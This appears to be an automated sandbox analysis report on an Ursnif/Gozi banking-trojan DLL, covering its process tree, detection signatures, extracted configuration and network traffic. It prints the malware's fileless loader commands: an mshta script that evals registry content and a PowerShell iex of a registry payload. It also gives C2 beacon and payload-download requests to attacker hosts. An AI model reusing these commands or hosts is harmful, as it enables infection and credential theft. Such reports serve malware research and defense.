Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Sample Name:	SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
Analysis ID:	353281
MD5:	f76b81b0397ae313b8f6d19d95c49edf
SHA1:	8f15106b524cc5db564845508a04ee3bf2709949
SHA256:	3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5576 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll' MD5: 8081BC925DFC69D40463079233C90FA5)

regsvr32.exe (PID: 5876 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 5528 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 6488 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 1380 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6192 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6940 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 4136 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6124 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 2920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3656 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4268 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4772 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 6908 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp	SUSP_LNK_SuspiciousCommands	Detects LNK file with suspicious content	Florian Roth	0x34:$s12: WScript.Shell 0x201a:$s12: WScript.Shell
00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
Process Memory Space: powershell.exe PID: 5424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 5876	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 30 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', ProcessId: 4136

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5424

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5528, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6488

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://c56.lepini.at/jvassets/xI/t64.dat

Avira URL Cloud: Label: phishing

Found malware configuration

Show sources

Source: regsvr32.exe.5876.2.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Virustotal: Detection: 16%			Perma Link
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	ReversingLabs: Detection: 10%

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
Source:	Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_033F3512
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,	32_2_04DB7500
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	32_2_04DBAACC

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View	IP Address: 104.20.184.68 104.20.184.68
Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

